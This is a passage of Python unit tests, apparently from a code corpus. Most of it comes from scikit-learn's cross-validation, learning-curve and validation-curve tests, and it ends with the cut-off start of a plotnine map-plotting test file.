    svm = SVC(kernel=lambda x, y: np.dot(x, y.T))
    score_callable = cross_val_score(svm, X, y)
    assert_array_almost_equal(score_precomputed, score_callable)
    # Error raised for non-square X
    svm = SVC(kernel="precomputed")
    assert_raises(ValueError, cross_val_score, svm, X, y)
    # test error is raised when the precomputed kernel is not array-like
    # or sparse
    assert_raises(ValueError, cross_val_score, svm,
                  linear_kernel.tolist(), y)
def test_cross_val_score_fit_params():
clf = MockClassifier()
n_samples = X.shape[0]
n_classes = len(np.unique(y))
W_sparse = coo_matrix((np.array([1]), (np.array([1]), np.array([0]))),
shape=(10, 1))
P_sparse = coo_matrix(np.eye(5))
DUMMY_INT = 42
DUMMY_STR = '42'
DUMMY_OBJ = object()
def assert_fit_params(clf):
# Function to test that the values are passed correctly to the
# classifier arguments for non-array type
assert_equal(clf.dummy_int, DUMMY_INT)
assert_equal(clf.dummy_str, DUMMY_STR)
assert_equal(clf.dummy_obj, DUMMY_OBJ)
fit_params = {'sample_weight': np.ones(n_samples),
'class_prior': np.ones(n_classes) / n_classes,
'sparse_sample_weight': W_sparse,
'sparse_param': P_sparse,
'dummy_int': DUMMY_INT,
'dummy_str': DUMMY_STR,
'dummy_obj': DUMMY_OBJ,
'callback': assert_fit_params}
cross_val_score(clf, X, y, fit_params=fit_params)
def test_cross_val_score_score_func():
    """A custom scorer built with make_scorer is invoked once per CV fold."""
    clf = MockClassifier()
    recorded_calls = []

    def score_func(y_test, y_predict):
        # Record every invocation so the fold count can be verified below.
        recorded_calls.append((y_test, y_predict))
        return 1.0

    with warnings.catch_warnings(record=True):
        score = cross_val_score(clf, X, y, scoring=make_scorer(score_func),
                                cv=3)
    assert_array_equal(score, [1.0, 1.0, 1.0])
    # cv=3 -> the scoring function must have been called exactly 3 times.
    assert len(recorded_calls) == 3
def test_cross_val_score_errors():
    """cross_val_score must reject objects lacking the estimator API."""
    class BrokenEstimator:
        # Deliberately implements no fit/score methods.
        pass

    assert_raises(TypeError, cross_val_score, BrokenEstimator(), X)
def test_cross_val_score_with_score_func_classification():
iris = load_iris()
clf = SVC(kernel='linear')
# Default score (should be the accuracy score)
scores = cross_val_score(clf, iris.data, iris.target, cv=5)
assert_array_almost_equal(scores, [0.97, 1., 0.97, 0.97, 1.], 2)
# Correct classification score (aka. zero / one score) - should be the
# same as the default estimator score
zo_scores = cross_val_score(clf, iris.data, iris.target,
scoring="accuracy", cv=5)
assert_array_almost_equal(zo_scores, [0.97, 1., 0.97, 0.97, 1.], 2)
# F1 score (class are balanced so f1_score should be equal to zero/one
# score
f1_scores = cross_val_score(clf, iris.data, iris.target,
scoring="f1_weighted", cv=5)
assert_array_almost_equal(f1_scores, [0.97, 1., 0.97, 0.97, 1.], 2)
def test_cross_val_score_with_score_func_regression():
X, y = make_regression(n_samples=30, n_features=20, n_informative=5,
random_state=0)
reg = Ridge()
# Default score of the Ridge regression estimator
scores = cross_val_score(reg, X, y, cv=5)
assert_array_almost_equal(scores, [0.94, 0.97, 0.97, 0.99, 0.92], 2)
# R2 score (aka. determination coefficient) - should be the
# same as the default estimator score
r2_scores = cross_val_score(reg, X, y, scoring="r2", cv=5)
assert_array_almost_equal(r2_scores, [0.94, 0.97, 0.97, 0.99, 0.92], 2)
# Mean squared error; this is a loss function, so "scores" are negative
neg_mse_scores = cross_val_score(reg, X, y, cv=5,
scoring="neg_mean_squared_error")
expected_neg_mse = np.array([-763.07, -553.16, -274.38, -273.26, -1681.99])
assert_array_almost_equal(neg_mse_scores, expected_neg_mse, 2)
# Explained variance
scoring = make_scorer(explained_variance_score)
ev_scores = cross_val_score(reg, X, y, cv=5, scoring=scoring)
assert_array_almost_equal(ev_scores, [0.94, 0.97, 0.97, 0.99, 0.92], 2)
def test_permutation_score():
iris = load_iris()
X = iris.data
X_sparse = coo_matrix(X)
y = iris.target
svm = SVC(kernel='linear')
cv = StratifiedKFold(2)
score, scores, pvalue = permutation_test_score(
svm, X, y, n_permutations=30, cv=cv, scoring="accuracy")
assert_greater(score, 0.9)
assert_almost_equal(pvalue, 0.0, 1)
score_group, _, pvalue_group = permutation_test_score(
svm, X, y, n_permutations=30, cv=cv, scoring="accuracy",
groups=np.ones(y.size), random_state=0)
assert_true(score_group == score)
assert_true(pvalue_group == pvalue)
# check that we obtain the same results with a sparse representation
svm_sparse = SVC(kernel='linear')
cv_sparse = StratifiedKFold(2)
score_group, _, pvalue_group = permutation_test_score(
svm_sparse, X_sparse, y, n_permutations=30, cv=cv_sparse,
scoring="accuracy", groups=np.ones(y.size), random_state=0)
assert_true(score_group == score)
assert_true(pvalue_group == pvalue)
# test with custom scoring object
def custom_score(y_true, y_pred):
return (((y_true == y_pred).sum() - (y_true != y_pred).sum()) /
y_true.shape[0])
scorer = make_scorer(custom_score)
score, _, pvalue = permutation_test_score(
svm, X, y, n_permutations=100, scoring=scorer, cv=cv, random_state=0)
assert_almost_equal(score, .93, 2)
assert_almost_equal(pvalue, 0.01, 3)
# set random y
y = np.mod(np.arange(len(y)), 3)
score, scores, pvalue = permutation_test_score(
svm, X, y, n_permutations=30, cv=cv, scoring="accuracy")
assert_less(score, 0.5)
assert_greater(pvalue, 0.2)
def test_permutation_test_score_allow_nans():
    # Check that permutation_test_score allows input data with NaNs
    X = np.arange(200, dtype=np.float64).reshape(10, -1)
    X[2, :] = np.nan
    # BUG FIX: use integer floor division for the repeat count.  A float
    # repeat count (`X.shape[0] / 2`) is deprecated and raises a TypeError
    # on modern NumPy.
    y = np.repeat([0, 1], X.shape[0] // 2)
    p = Pipeline([
        ('imputer', Imputer(strategy='mean', missing_values='NaN')),
        ('classifier', MockClassifier()),
    ])
    permutation_test_score(p, X, y, cv=5)
def test_cross_val_score_allow_nans():
    # Check that cross_val_score allows input data with NaNs
    X = np.arange(200, dtype=np.float64).reshape(10, -1)
    X[2, :] = np.nan
    # BUG FIX: use integer floor division for the repeat count.  A float
    # repeat count (`X.shape[0] / 2`) is deprecated and raises a TypeError
    # on modern NumPy.
    y = np.repeat([0, 1], X.shape[0] // 2)
    p = Pipeline([
        ('imputer', Imputer(strategy='mean', missing_values='NaN')),
        ('classifier', MockClassifier()),
    ])
    cross_val_score(p, X, y, cv=5)
def test_cross_val_score_multilabel():
X = np.array([[-3, 4], [2, 4], [3, 3], [0, 2], [-3, 1],
[-2, 1], [0, 0], [-2, -1], [-1, -2], [1, -2]])
y = np.array([[1, 1], [0, 1], [0, 1], [0, 1], [1, 1],
[0, 1], [1, 0], [1, 1], [1, 0], [0, 0]])
clf = KNeighborsClassifier(n_neighbors=1)
scoring_micro = make_scorer(precision_score, average='micro')
scoring_macro = make_scorer(precision_score, average='macro')
scoring_samples = make_scorer(precision_score, average='samples')
score_micro = cross_val_score(clf, X, y, scoring=scoring_micro, cv=5)
score_macro = cross_val_score(clf, X, y, scoring=scoring_macro, cv=5)
score_samples = cross_val_score(clf, X, y, scoring=scoring_samples, cv=5)
assert_almost_equal(score_micro, [1, 1 / 2, 3 / 4, 1 / 2, 1 / 3])
assert_almost_equal(score_macro, [1, 1 / 2, 3 / 4, 1 / 2, 1 / 4])
assert_almost_equal(score_samples, [1, 1 / 2, 3 / 4, 1 / 2, 1 / 4])
def test_cross_val_predict():
boston = load_boston()
X, y = boston.data, boston.target
cv = KFold()
est = Ridge()
# Naive loop (should be same as cross_val_predict):
preds2 = np.zeros_like(y)
for train, test in cv.split(X, y):
est.fit(X[train], y[train])
preds2[test] = est.predict(X[test])
preds = cross_val_predict(est, X, y, cv=cv)
assert_array_almost_equal(preds, preds2)
preds = cross_val_predict(est, X, y)
assert_equal(len(preds), len(y))
cv = LeaveOneOut()
preds = cross_val_predict(est, X, y, cv=cv)
assert_equal(len(preds), len(y))
Xsp = X.copy()
Xsp *= (Xsp > np.median(Xsp))
Xsp = coo_matrix(Xsp)
preds = cross_val_predict(est, Xsp, y)
assert_array_almost_equal(len(preds), len(y))
preds = cross_val_predict(KMeans(), X)
assert_equal(len(preds), len(y))
class BadCV():
def split(self, X, y=None, groups=None):
for i in range(4):
yield np.array([0, 1, 2, 3]), np.array([4, 5, 6, 7, 8])
assert_raises(ValueError, cross_val_predict, est, X, y, cv=BadCV())
X, y = load_iris(return_X_y=True)
warning_message = ('Number of classes in training fold (2) does '
'not match total number of classes (3). '
'Results may not be appropriate for your use case.')
assert_warns_message(RuntimeWarning, warning_message,
cross_val_predict, LogisticRegression(),
X, y, method='predict_proba', cv=KFold(2))
def test_cross_val_predict_decision_function_shape():
    X, y = make_classification(n_classes=2, n_samples=50, random_state=0)
    # Binary problem: decision_function output is 1-d.
    preds = cross_val_predict(LogisticRegression(), X, y,
                              method='decision_function')
    assert_equal(preds.shape, (50,))
    X, y = load_iris(return_X_y=True)
    # Multiclass (ovr): one column per class.
    preds = cross_val_predict(LogisticRegression(), X, y,
                              method='decision_function')
    assert_equal(preds.shape, (150, 3))
    # This specifically tests imbalanced splits for binary
    # classification with decision_function. This is only
    # applicable to classifiers that can be fit on a single
    # class.
    X = X[:100]
    y = y[:100]
    assert_raise_message(ValueError,
                         'Only 1 class/es in training fold, this'
                         ' is not supported for decision_function'
                         ' with imbalanced folds. To fix '
                         'this, use a cross-validation technique '
                         'resulting in properly stratified folds',
                         cross_val_predict, RidgeClassifier(), X, y,
                         method='decision_function', cv=KFold(2))
    X, y = load_digits(return_X_y=True)
    est = SVC(kernel='linear', decision_function_shape='ovo')
    # ovo: n_classes * (n_classes - 1) / 2 = 45 columns for 10 classes.
    preds = cross_val_predict(est,
                              X, y,
                              method='decision_function')
    assert_equal(preds.shape, (1797, 45))
    ind = np.argsort(y)
    X, y = X[ind], y[ind]
    # FIX: use raw strings for the regex patterns.  Non-raw strings with
    # `\(` contain invalid escape sequences, which are a SyntaxWarning on
    # recent Pythons (the runtime value is unchanged).
    assert_raises_regex(ValueError,
                        r'Output shape \(599L?, 21L?\) of decision_function '
                        r'does not match number of classes \(7\) in fold. '
                        r'Irregular decision_function .*',
                        cross_val_predict, est, X, y,
                        cv=KFold(n_splits=3), method='decision_function')
def test_cross_val_predict_predict_proba_shape():
X, y = make_classification(n_classes=2, n_samples=50, random_state=0)
preds = cross_val_predict(LogisticRegression(), X, y,
method='predict_proba')
assert_equal(preds.shape, (50, 2))
X, y = load_iris(return_X_y=True)
preds = cross_val_predict(LogisticRegression(), X, y,
method='predict_proba')
assert_equal(preds.shape, (150, 3))
def test_cross_val_predict_predict_log_proba_shape():
X, y = make_classification(n_classes=2, n_samples=50, random_state=0)
preds = cross_val_predict(LogisticRegression(), X, y,
method='predict_log_proba')
assert_equal(preds.shape, (50, 2))
X, y = load_iris(return_X_y=True)
preds = cross_val_predict(LogisticRegression(), X, y,
method='predict_log_proba')
assert_equal(preds.shape, (150, 3))
def test_cross_val_predict_input_types():
iris = load_iris()
X, y = iris.data, iris.target
X_sparse = coo_matrix(X)
multioutput_y = np.column_stack([y, y[::-1]])
clf = Ridge(fit_intercept=False, random_state=0)
# 3 fold cv is used --> atleast 3 samples per class
# Smoke test
predictions = cross_val_predict(clf, X, y)
assert_equal(predictions.shape, (150,))
# test with multioutput y
predictions = cross_val_predict(clf, X_sparse, multioutput_y)
assert_equal(predictions.shape, (150, 2))
predictions = cross_val_predict(clf, X_sparse, y)
assert_array_equal(predictions.shape, (150,))
# test with multioutput y
predictions = cross_val_predict(clf, X_sparse, multioutput_y)
assert_array_equal(predictions.shape, (150, 2))
# test with X and y as list
list_check = lambda x: isinstance(x, list)
clf = CheckingClassifier(check_X=list_check)
predictions = cross_val_predict(clf, X.tolist(), y.tolist())
clf = CheckingClassifier(check_y=list_check)
predictions = cross_val_predict(clf, X, y.tolist())
# test with X and y as list and non empty method
predictions = cross_val_predict(LogisticRegression(), X.tolist(),
y.tolist(), method='decision_function')
predictions = cross_val_predict(LogisticRegression(), X,
y.tolist(), method='decision_function')
# test with 3d X and
X_3d = X[:, :, np.newaxis]
check_3d = lambda x: x.ndim == 3
clf = CheckingClassifier(check_X=check_3d)
predictions = cross_val_predict(clf, X_3d, y)
assert_array_equal(predictions.shape, (150,))
def test_cross_val_predict_pandas():
# check cross_val_score doesn't destroy pandas dataframe
types = [(MockDataFrame, MockDataFrame)]
try:
from pandas import Series, DataFrame
types.append((Series, DataFrame))
except ImportError:
pass
for TargetType, InputFeatureType in types:
# X dataframe, y series
X_df, y_ser = InputFeatureType(X), TargetType(y2)
check_df = lambda x: isinstance(x, InputFeatureType)
check_series = lambda x: isinstance(x, TargetType)
clf = CheckingClassifier(check_X=check_df, check_y=check_series)
cross_val_predict(clf, X_df, y_ser)
def test_cross_val_score_sparse_fit_params():
    """fit_params containing sparse matrices must be forwarded intact."""
    iris = load_iris()
    X, y = iris.data, iris.target
    clf = MockClassifier()
    params = {'sparse_sample_weight': coo_matrix(np.eye(X.shape[0]))}
    # MockClassifier validates the sparse parameter; all 3 folds score 1.
    scores = cross_val_score(clf, X, y, fit_params=params)
    assert_array_equal(scores, np.ones(3))
def test_learning_curve():
n_samples = 30
n_splits = 3
X, y = make_classification(n_samples=n_samples, n_features=1,
n_informative=1, n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(n_samples * ((n_splits - 1) / n_splits))
for shuffle_train in [False, True]:
with warnings.catch_warnings(record=True) as w:
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=KFold(n_splits=n_splits),
train_sizes=np.linspace(0.1, 1.0, 10),
shuffle=shuffle_train)
if len(w) > 0:
raise RuntimeError("Unexpected warning: %r" % w[0].message)
assert_equal(train_scores.shape, (10, 3))
assert_equal(test_scores.shape, (10, 3))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
# Test a custom cv splitter that can iterate only once
with warnings.catch_warnings(record=True) as w:
train_sizes2, train_scores2, test_scores2 = learning_curve(
estimator, X, y,
cv=OneTimeSplitter(n_splits=n_splits, n_samples=n_samples),
train_sizes=np.linspace(0.1, 1.0, 10),
shuffle=shuffle_train)
if len(w) > 0:
raise RuntimeError("Unexpected warning: %r" % w[0].message)
assert_array_almost_equal(train_scores2, train_scores)
assert_array_almost_equal(test_scores2, test_scores)
def test_learning_curve_unsupervised():
X, _ = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y=None, cv=3, train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_verbose():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
train_sizes, train_scores, test_scores = \
learning_curve(estimator, X, y, cv=3, verbose=1)
finally:
out = sys.stdout.getvalue()
sys.stdout.close()
sys.stdout = old_stdout
assert("[learning_curve]" in out)
def test_learning_curve_incremental_learning_not_possible():
X, y = make_classification(n_samples=2, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
# The mockup does not have partial_fit()
estimator = MockImprovingEstimator(1)
assert_raises(ValueError, learning_curve, estimator, X, y,
exploit_incremental_learning=True)
def test_learning_curve_incremental_learning():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockIncrementalImprovingEstimator(20)
for shuffle_train in [False, True]:
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=3, exploit_incremental_learning=True,
train_sizes=np.linspace(0.1, 1.0, 10), shuffle=shuffle_train)
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_incremental_learning_unsupervised():
X, _ = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockIncrementalImprovingEstimator(20)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y=None, cv=3, exploit_incremental_learning=True,
train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_batch_and_incremental_learning_are_equal():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
train_sizes = np.linspace(0.2, 1.0, 5)
estimator = PassiveAggressiveClassifier(max_iter=1, tol=None,
shuffle=False)
train_sizes_inc, train_scores_inc, test_scores_inc = \
learning_curve(
estimator, X, y, train_sizes=train_sizes,
cv=3, exploit_incremental_learning=True)
train_sizes_batch, train_scores_batch, test_scores_batch = \
learning_curve(
estimator, X, y, cv=3, train_sizes=train_sizes,
exploit_incremental_learning=False)
assert_array_equal(train_sizes_inc, train_sizes_batch)
assert_array_almost_equal(train_scores_inc.mean(axis=1),
train_scores_batch.mean(axis=1))
assert_array_almost_equal(test_scores_inc.mean(axis=1),
test_scores_batch.mean(axis=1))
def test_learning_curve_n_sample_range_out_of_bounds():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0, 1])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0.0, 1.0])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0.1, 1.1])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0, 20])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[1, 21])
def test_learning_curve_remove_duplicate_sample_sizes():
X, y = make_classification(n_samples=3, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(2)
train_sizes, _, _ = assert_warns(
RuntimeWarning, learning_curve, estimator, X, y, cv=3,
train_sizes=np.linspace(0.33, 1.0, 3))
assert_array_equal(train_sizes, [1, 2])
def test_learning_curve_with_boolean_indices():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
cv = KFold(n_splits=3)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_with_shuffle():
# Following test case was designed this way to verify the code
# changes made in pull request: #7506.
X = np.array([[1, 2], [3, 4], [5, 6], [7, 8], [11, 12], [13, 14], [15, 16],
[17, 18], [19, 20], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18]])
y = np.array([1, 1, 1, 2, 3, 4, 1, 1, 2, 3, 4, 1, 2, 3, 4])
groups = np.array([1, 1, 1, 1, 1, 1, 3, 3, 3, 3, 3, 4, 4, 4, 4])
# Splits on these groups fail without shuffle as the first iteration
# of the learning curve doesn't contain label 4 in the training set.
estimator = PassiveAggressiveClassifier(max_iter=5, tol=None,
shuffle=False)
cv = GroupKFold(n_splits=2)
train_sizes_batch, train_scores_batch, test_scores_batch = learning_curve(
estimator, X, y, cv=cv, n_jobs=1, train_sizes=np.linspace(0.3, 1.0, 3),
groups=groups, shuffle=True, random_state=2)
assert_array_almost_equal(train_scores_batch.mean(axis=1),
np.array([0.75, 0.3, 0.36111111]))
assert_array_almost_equal(test_scores_batch.mean(axis=1),
np.array([0.36111111, 0.25, 0.25]))
assert_raises(ValueError, learning_curve, estimator, X, y, cv=cv, n_jobs=1,
train_sizes=np.linspace(0.3, 1.0, 3), groups=groups)
train_sizes_inc, train_scores_inc, test_scores_inc = learning_curve(
estimator, X, y, cv=cv, n_jobs=1, train_sizes=np.linspace(0.3, 1.0, 3),
groups=groups, shuffle=True, random_state=2,
exploit_incremental_learning=True)
assert_array_almost_equal(train_scores_inc.mean(axis=1),
train_scores_batch.mean(axis=1))
assert_array_almost_equal(test_scores_inc.mean(axis=1),
test_scores_batch.mean(axis=1))
def test_validation_curve():
X, y = make_classification(n_samples=2, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
param_range = np.linspace(0, 1, 10)
with warnings.catch_warnings(record=True) as w:
train_scores, test_scores = validation_curve(
MockEstimatorWithParameter(), X, y, param_name="param",
param_range=param_range, cv=2
)
if len(w) > 0:
raise RuntimeError("Unexpected warning: %r" % w[0].message)
assert_array_almost_equal(train_scores.mean(axis=1), param_range)
assert_array_almost_equal(test_scores.mean(axis=1), 1 - param_range)
def test_validation_curve_clone_estimator():
X, y = make_classification(n_samples=2, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
param_range = np.linspace(1, 0, 10)
_, _ = validation_curve(
MockEstimatorWithSingleFitCallAllowed(), X, y,
param_name="param", param_range=param_range, cv=2
)
def test_validation_curve_cv_splits_consistency():
n_samples = 100
n_splits = 5
X, y = make_classification(n_samples=100, random_state=0)
scores1 = validation_curve(SVC(kernel='linear', random_state=0), X, y,
'C', [0.1, 0.1, 0.2, 0.2],
cv=OneTimeSplitter(n_splits=n_splits,
n_samples=n_samples))
# The OneTimeSplitter is a non-re-entrant cv splitter. Unless, the
# `split` is called for each parameter, the following should produce
# identical results for param setting 1 and param setting 2 as both have
# the same C value.
assert_array_almost_equal(*np.vsplit(np.hstack(scores1)[(0, 2, 1, 3), :],
2))
scores2 = validation_curve(SVC(kernel='linear', random_state=0), X, y,
'C', [0.1, 0.1, 0.2, 0.2],
cv=KFold(n_splits=n_splits, shuffle=True))
# For scores2, compare the 1st and 2nd parameter's scores
# (Since the C value for 1st two param setting is 0.1, they must be
# consistent unless the train test folds differ between the param settings)
assert_array_almost_equal(*np.vsplit(np.hstack(scores2)[(0, 2, 1, 3), :],
2))
scores3 = validation_curve(SVC(kernel='linear', random_state=0), X, y,
'C', [0.1, 0.1, 0.2, 0.2],
cv=KFold(n_splits=n_splits))
# OneTimeSplitter is basically unshuffled KFold(n_splits=5). Sanity check.
assert_array_almost_equal(np.array(scores3), np.array(scores1))
def test_check_is_permutation():
    """Sanity checks for the private _check_is_permutation helper."""
    rng = np.random.RandomState(0)
    perm = np.arange(100)
    rng.shuffle(perm)
    # A shuffled 0..99 range is a valid permutation.
    assert_true(_check_is_permutation(perm, 100))
    # Dropping one element breaks the permutation property.
    assert_false(_check_is_permutation(np.delete(perm, 23), 100))
    # Introducing a duplicate value breaks it as well.
    perm[0] = 23
    assert_false(_check_is_permutation(perm, 100))
    # Check if the additional duplicate indices are caught
    assert_false(_check_is_permutation(np.hstack((perm, 0)), 100))
def test_cross_val_predict_sparse_prediction():
# check that cross_val_predict gives same result for sparse and dense input
X, y = make_multilabel_classification(n_classes=2, n_labels=1,
allow_unlabeled=False,
return_indicator=True,
random_state=1)
X_sparse = csr_matrix(X)
y_sparse = csr_matrix(y)
classif = OneVsRestClassifier(SVC(kernel='linear'))
preds = cross_val_predict(classif, X, y, cv=10)
preds_sparse = cross_val_predict(classif, X_sparse, y_sparse, cv=10)
preds_sparse = preds_sparse.toarray()
assert_array_almost_equal(preds_sparse, preds)
def check_cross_val_predict_with_method(est):
iris = load_iris()
X, y = iris.data, iris.target
X, y = shuffle(X, y, random_state=0)
classes = len(set(y))
kfold = KFold()
methods = ['decision_function', 'predict_proba', 'predict_log_proba']
for method in methods:
predictions = cross_val_predict(est, X, y, method=method)
assert_equal(len(predictions), len(y))
expected_predictions = np.zeros([len(y), classes])
func = getattr(est, method)
# Naive loop (should be same as cross_val_predict):
for train, test in kfold.split(X, y):
est.fit(X[train], y[train])
expected_predictions[test] = func(X[test])
predictions = cross_val_predict(est, X, y, method=method,
cv=kfold)
assert_array_almost_equal(expected_predictions, predictions)
# Test alternative representations of y
predictions_y1 = cross_val_predict(est, X, y + 1, method=method,
cv=kfold)
assert_array_equal(predictions, predictions_y1)
predictions_y2 = cross_val_predict(est, X, y - 2, method=method,
cv=kfold)
assert_array_equal(predictions, predictions_y2)
predictions_ystr = cross_val_predict(est, X, y.astype('str'),
method=method, cv=kfold)
assert_array_equal(predictions, predictions_ystr)
def test_cross_val_predict_with_method():
check_cross_val_predict_with_method(LogisticRegression())
def test_cross_val_predict_method_checking():
# Regression test for issue #9639. Tests that cross_val_predict does not
# check estimator methods (e.g. predict_proba) before fitting
est = SGDClassifier(loss='log', random_state=2)
check_cross_val_predict_with_method(est)
def test_gridsearchcv_cross_val_predict_with_method():
est = GridSearchCV(LogisticRegression(random_state=42),
{'C': [0.1, 1]},
cv=2)
check_cross_val_predict_with_method(est)
def get_expected_predictions(X, y, cv, classes, est, method):
    """Compute cross-validated predictions with a naive split loop.

    Mirrors what ``cross_val_predict`` should return: for every split the
    estimator is fit on the train fold and ``method`` is evaluated on the
    test fold.  Columns for classes absent from a training fold are filled
    with the method's "minimal" value (0 for probabilities, the dtype's
    most negative finite value for decision values).
    """
    expected_predictions = np.zeros([len(y), classes])
    func = getattr(est, method)
    for train, test in cv.split(X, y):
        est.fit(X[train], y[train])
        expected_predictions_ = func(X[test])
        # To avoid 2 dimensional indexing
        # FIX: compare strings with ``==``, not ``is`` — identity of string
        # literals relies on CPython interning and is a SyntaxWarning on
        # recent Python versions.
        if method == 'predict_proba':
            exp_pred_test = np.zeros((len(test), classes))
        else:
            exp_pred_test = np.full((len(test), classes),
                                    np.finfo(expected_predictions.dtype).min)
        # Scatter the fold's outputs into the columns of the classes the
        # estimator actually saw during fit (est.classes_).
        exp_pred_test[:, est.classes_] = expected_predictions_
        expected_predictions[test] = exp_pred_test
    return expected_predictions
def test_cross_val_predict_class_subset():
X = np.arange(200).reshape(100, 2)
y = np.array([x//10 for x in range(100)])
classes = 10
kfold3 = KFold(n_splits=3)
kfold4 = KFold(n_splits=4)
le = LabelEncoder()
methods = ['decision_function', 'predict_proba', 'predict_log_proba']
for method in methods:
est = LogisticRegression()
# Test with n_splits=3
predictions = cross_val_predict(est, X, y, method=method,
cv=kfold3)
# Runs a naive loop (should be same as cross_val_predict):
expected_predictions = get_expected_predictions(X, y, kfold3, classes,
est, method)
assert_array_almost_equal(expected_predictions, predictions)
# Test with n_splits=4
predictions = cross_val_predict(est, X, y, method=method,
cv=kfold4)
expected_predictions = get_expected_predictions(X, y, kfold4, classes,
est, method)
assert_array_almost_equal(expected_predictions, predictions)
# Testing unordered labels
y = shuffle(np.repeat(range(10), 10), random_state=0)
predictions = cross_val_predict(est, X, y, method=method,
cv=kfold3)
y = le.fit_transform(y)
expected_predictions = get_expected_predictions(X, y, kfold3, classes,
est, method)
assert_array_almost_equal(expected_predictions, predictions)
def test_score_memmap():
    # Ensure a scalar score of memmap type is accepted
    iris = load_iris()
    X, y = iris.data, iris.target
    clf = MockClassifier()
    # Create a small backing file so that memmaps can be built on it.
    tf = tempfile.NamedTemporaryFile(mode='wb', delete=False)
    tf.write(b'Hello world!!!!!')
    tf.close()
    scores = np.memmap(tf.name, dtype=np.float64)  # 1-d memmap (non-scalar)
    score = np.memmap(tf.name, shape=(), mode='r', dtype=np.float64)  # scalar
    try:
        # A 0-d (scalar) memmap score must be accepted by cross_val_score.
        cross_val_score(clf, X, y, scoring=lambda est, X, y: score)
        # non-scalar should still fail
        assert_raises(ValueError, cross_val_score, clf, X, y,
                      scoring=lambda est, X, y: scores)
    finally:
        # Best effort to release the mmap file handles before deleting the
        # backing file under Windows
        scores, score = None, None
        for _ in range(3):
            try:
                os.unlink(tf.name)
                break
            except WindowsError:
                # File may still be locked by the mmap; retry after a pause.
                sleep(1.)
def test_permutation_test_score_pandas():
    """permutation_test_score must not destroy pandas-like containers."""
    # Always exercise the mock container; add real pandas types if installed.
    container_pairs = [(MockDataFrame, MockDataFrame)]
    try:
        from pandas import Series, DataFrame
    except ImportError:
        pass
    else:
        container_pairs.append((Series, DataFrame))

    for target_type, feature_type in container_pairs:
        # X dataframe, y series
        iris = load_iris()
        X, y = iris.data, iris.target
        X_df = feature_type(X)
        y_ser = target_type(y)
        clf = CheckingClassifier(
            check_X=lambda x: isinstance(x, feature_type),
            check_y=lambda x: isinstance(x, target_type))
        permutation_test_score(clf, X_df, y_ser)
| mit |
has2k1/plotnine | plotnine/tests/test_geom_map.py | 1 | 2879 | import numpy as np
import shapefile
from geopandas import GeoDataFrame
from plotnine import ggplot, aes, geom_map, labs, theme, facet_wrap
# Shared test theme: widen the right margin so legends fit the baseline images.
_theme = theme(subplots_adjust={'right': 0.85})
def _point_file(test_file):
    """Write a 4-point shapefile (unit-square corners) to *test_file*."""
    corners = [(0, 0), (0, 1), (1, 1), (1, 0)]
    with shapefile.Writer(test_file, shapefile.POINT) as shp:
        shp.field('name', 'C')
        # One record per corner, named point1..point4 in order.
        for number, (px, py) in enumerate(corners, start=1):
